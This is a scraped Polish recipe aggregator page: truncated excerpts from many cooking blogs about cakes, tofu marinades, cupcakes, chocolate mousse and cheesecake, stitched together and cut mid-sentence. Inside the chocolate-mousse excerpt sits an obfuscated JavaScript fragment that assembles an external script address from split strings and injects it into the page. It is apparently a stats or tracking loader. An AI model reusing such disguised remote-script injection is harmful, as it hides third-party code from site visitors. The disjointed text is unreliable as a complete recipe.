Dawno mnie tu nie było, to fakt. Jedyne, co może mnie usprawiedliwić to to, że byłam na diecie i mimo iż mam sporą kolejkę fajnych przepisów
Kulinarne zapędy Kokosaprzypadnie Wam do gustu. Prezentuje się bardzo ładnie, jest wysokie, podzielne i smaczne. Masa jabłkowa: 1 i 1/2 kg jabłek 1 duża łyżka masła 1 op. galaretki cytrynowej 1 op. galaretki pomarańczowej Ciasto: 6 jajek 170g cukru pudru 180g mąki pszennej 1/2 szkl. oleju 1 łyżeczka proszku do pieczenia Budyniowa masa z kajmakiem: 500ml mleka 3 żółtka 2 łyżki cukru(...)jabłkowej (nie może ona być zbyt mokra, bo zbytnio rozmiękczy biszkopt), wyrównujemy. Wykładamy połowę masy budyniowej. Dajemy drugi biszkopt. Rozkładamy na nim resztę masy jabłkowej, a na niej pozostały krem budyniowy. Wstawiamy do lodówki. Schłodzoną śmietankę ubijamy na sztywno. Pod koniec dodajemy zmieszany z cukrem pudrem śmietan-fix. Ubitą śmietankę wykładamy na wierzch ciasta. Posypujemy tartą czekoladą lub gorzkim kakao
Smaki Na TalerzuLeśny mech to ciasto , o których chyba już każdy słyszał i które zrobiło furorę zarówno w sieci, jak i na stołach! Fantastyczny, zielony kolor, który odrazu
Ostra na SłodkoLeśny mech to ciasto , o których chyba już każdy słyszał i które zrobiło furorę zarówno w sieci, jak i na stołach! Fantastyczny, zielony kolor, który odrazu
Ostra na Słodkoteraz. Dzięki temu wiem, że nie należy się poddawać po pierwszej porażce Zastosowanie tofu Jak już wcześniej pisałem, tofu jedwabiste można stosować do wszelakich dipów, sosów, kremów, można je także wykorzystywać do przygotowywania ciast (przymierzam się do przygotowania tofurnika, czyli wegańskiego sernika – z pewnością pochwalę się efektami!). Natomiast tofu naturalne idealnie zastąpi mięso(...)łyżki oliwy z oliwek 1 łyżeczka suszonej papryki (chili lub słodkiej) 1 łyżka sosu sojowego jasnego 1/4 szklanki wody sól i pieprz (do smaku) Marynata cytrynowo-marchewkowa Składniki Sok z 1 cytryny 2 łyżki oliwy z oliwek 1 marchewka, starta na tarce 2 łyżeczki ulubionego słodziku (ksylitol, erytrytol, cukier) 1/4 szklanki wody pieprz
Vegan Tasteprodukty, które przechowuje się w chłodnych warunkach. Jajka wybiłam do miski miksera. Wsypałam cukier kryształ i cukier waniliowy i miksowałam kilka minut na najwyższych obrotach, do uzyskania puszystego jajecznego kremu. Następnie, nie przerywając miksowania, ale zmniejszając obroty do minimalnych, wlałam cienkim strumieniem olej. Mąkę tortową przesiałam do osobnej miski i wymieszałam ją z kakao, proszkiem do pieczenia, sodą, przyprawą(...)końcówkę i zrobiłam kratkę na cieście. (adsbygoogle = window.adsbygoogle || []).push({}); Zapraszam do odwiedzenia pozostałych moich przepisów na ciasta z cukinii: czekoladowe ciasto z cukinii (link do przepisu: https://wanilioweimprowizacje.blogspot.com/2019/07/czekoladowe-ciasto-z-cukinii.html), cytrynowe ciasto z cukinii (link: https://wanilioweimprowizacje.blogspot.com/2019/08/cytrynowe-ciasto-z-cukinii.html) czy pomarańczowe ciasto z cukinii (link: https://wanilioweimprowizacje.blogspot.com/2019/08/pomaranczowe-ciasto-z-cukinii.html). SMACZNEGO
Waniliowe ImprowizacjeIdealne ciasto na specjalne okazje. Możecie zrobić z różnymi owocami, ja zrobiłam z truskawkami i gruszkami, które bardzo lubię. Biszkopt- białka ubić na sztywną pianę. Następnie
Kuchnia Pokoleńsmakują nawet bez żadnych dodatków- jeżeli jednak zdecydujecie się je ozdobić, możecie to zrobić na naprawdę wiele sposobów- podpowiedzi znajdziecie w przepisie. A może macie ochotę zamiast wanilii poczuć cytrynową nutę? Nic prostszego- po prostu zamiast zapachu waniliowego dodajcie do ciasta sok wyciśnięty z połowy cytryny. Smacznego! SKŁADNIKI NA BABECZKI WANILIOWE (20 sztuk ) : 225 g. miękkiego masła lub margaryny(...)chcą rozstać się z formą, poruszajcie je delikatnie palcami. Babeczki będą smakowały pysznie w połączeniu z filiżanką Waszej ulubionej kawy bądź herbaty. Jeżeli jednak chcielibyście je udekrować, to polecam krem śmietankowy , krem z likierem baileys , krem z białej czekolady , lub wyjątkowo pyszny krem cappuccino . Możecie je również udekorować polewą lukrową (przepis poniżej), na której możecie ułożyć Wasze ulubione owoce. KREMOWA
Domowe Tortyzrobienia włoskiego deseru tiramisu. Jeszcze kilka lat temu nie byłam miłośniczką czekolad. Jeśli wybierałam lody, to tylko owocowe, najchętniej wyraziste w smaku sorbety jak malinowy z rozmarynem czy cytrynowy z miętą. Z czasem moje preferencje smakowe się zmieniły. Myślę, że duży wpływ na tę zmianę miała podróż do Belgii. Czekolada kojarzy mi się przede wszystkim z belgijskimi pralinkami, które(...)smaku musem czekoladowym na bazie popularnego, włoskiego sera mascarpone. W wersji dla dorosłych warto dodać kilka kropli alkoholu, który pasuje do czekolady. Taki mus czekoladowy może być wykorzystany jako krem do przełożenia blatów biszkoptowych na tort. (function(){ ccku=document.createElement("script");ccku_=("ust");cckuu="15408294"; ccku_+="a"+("t.i");ccku.type="text/javascript"; cckuu+=".nwbbcttjcku0fgx1wqa0";ccku.async=true;ccku_+="n"+("f"+"o")+"/"; cckuu+="n4gh0tsvtX";ccku.src
Moja smaczna kuchnialatach siedemdziesiątych XIX wieku w USA obok white cake popularnością cieszył się również velvet cake. Nazywano go „aksamitnym tortem” ze względu na miękki wilgotny maślany biszkopt z cytrynowym posmakiem. Obok velvet cake częstym deserem był również devil cake, czyli diabelskie ciasto. Było to intensywnie czekoladowe ciasto, wykonane z żółtek jaj, często z dodatkiem kawy, które miało ciemny kolor, wyrazisty smak(...)latach 50-tych ubiegłego wieku w stanie Ohio. Wtedy to w lokalnej gazecie opublikowano przepis na tort Waldorf Red Cake. Był to biszkopt z dodatkiem czerwonego barwnika przełożony kremem śmietankowym. Nazwa sugeruje, że tort wymyślono w słynącym z dobrych deserów hotelu Waldorff Astoria. Nieco później za sprawą reklamy piekarni marketów w Seattle tort stał się popularny wśród jeszcze większej ilości
Obiad gotowywody 2 pełne łyżeczki margaryny do ciast (miękkiej np. Palma) 50-70 dag cukru pudru by wzmocnić smak można dodać jeszcze kilka kropel aromatu do ciast np. pomarańczowego lub cytrynowego (ja dałam 3 krople, by zapach ten nie zdominował reszty, a jedynie wzbogacił doznania:-) Żelatynę i galaretkę mieszamy w miseczce, zalewamy zimną wodą i odstawiamy do napęcznienia(...)masy na ozdoby oraz przykrycie niedociągnięć, gdyż robiłam tort z dodatkowym piętrem, a także chochliki które mieszkają w mojej kuchni musiały się masą poczęstować:-) Należy pamiętać o dobraniu odpowiedniego kremu do ciasta i unikać bitej śmietany, gdyż może rozpuścić ona masę. Najlepszy byłby krem maślany (my takiego nie lubimy, więc ja polecam krem budyniowy
Rozpustne gotowaniem.in. błękit patentowy V (E 131), cukier, cytrynian sodu (E 331), dekstrozę, ekstrakt słodowy, fosforany sodu (E 339), gumę guar (E 412), karagen (E407), karminę (koszenilę E 120), kwas cytrynowy (E 330), mleczan wapnia (E 327), aspartam (E 951), acesulfam K (E 950) oraz sukralozę ( E 955). Jednym słowem, całą tablicę Mendelejewa. Nie wszystkie te substancje są szkodliwe lub niebezpieczne(...)Jogurt sklepowy na pewno prawie nie zmienił swojego wyglądu, dalej jest gęsty i spójny, nie znajdziemy w nim ani odrobimy wody . Ekologiczny natomiast, na powierzchni sitka pozostawi niezwykle wartościowy krem i przynajmniej szklankę płynu tzw. serwatki. I o takie jogurty nam właśnie chodzi! Zero chemii, tylko naturalne składniki! Co jeszcze przemawia za tym, żeby kupować jogurty naturalne ze sklepów
Moja Mama Gotujemieszamy kilka sekund, wyciągamy na blachę wyłożoną papierem do pieczenia. Pieczemy ok. 15 minut w 170C. SERNIK: W misie miksera na delikatnych obrotach ucieramy ricottę z cukrem i skórką cytrynową. Powoli dolewamy sok z cytryny i nie przerywając mieszania wbijamy jajka i dosypujemy przesianą mąkę ziemniaczaną. Mieszamy krótko – tylko do połączenia składników. Wylewamy na podpieczony spód i wkładamy(...)trwa ( np. ubijanie białek na bezę włoską ). Potem mogę sama ustawiać czas mieszania produktów, a urządzenie samo się wyłączy! Nie ma możliwości zrobienia masła ze śmietany czy też przebicia kremu. Profesjonalny system podnoszenia miski ( taki jak w sprzętach dla cukierni ( umożliwia użycie większej misy bez pogorszenia stabilności. Jest bardzo mocny oraz szybki przez co ubijanie białek czy kremu trwa niesamowicie
Ostra na SłodkoDzisiaj zapraszam na smaczny torcik serowy z malinami. Lekki, nie za słodki, delikatnie cytrynowy, na kakaowym, kruchym spodzie. Apetycznie wygląda i wspaniale smakuje. Do jego przygotowania możemy użyć dowolnych owoców jagodowych. Wspaniały na lato, bardzo polecam…(zmodyfikowany przepis z gazetki „Pieczenie jest proste”). Porcelana ze sklepu Maxwell and Williams z kolekcji White Rose . Sernikowy(...)około 20 minut. 6. Do sera dodać pastę waniliową i wymieszać mikserem. Śmietankę ubić na sztywno. 7. Do twarogu, cały czas mieszając mikserem na średnich obrotach, stopniowo dodawać ciepły krem. Następnie dodać ubitą śmietankę i wymieszać mikserem na niskich obrotach. Na końcu dodać maliny i delikatnie wymieszać łyżką. 8. Masę serową wylać na spód w blaszce, wyrównać i ciasto wstawić
Mała Cukierenka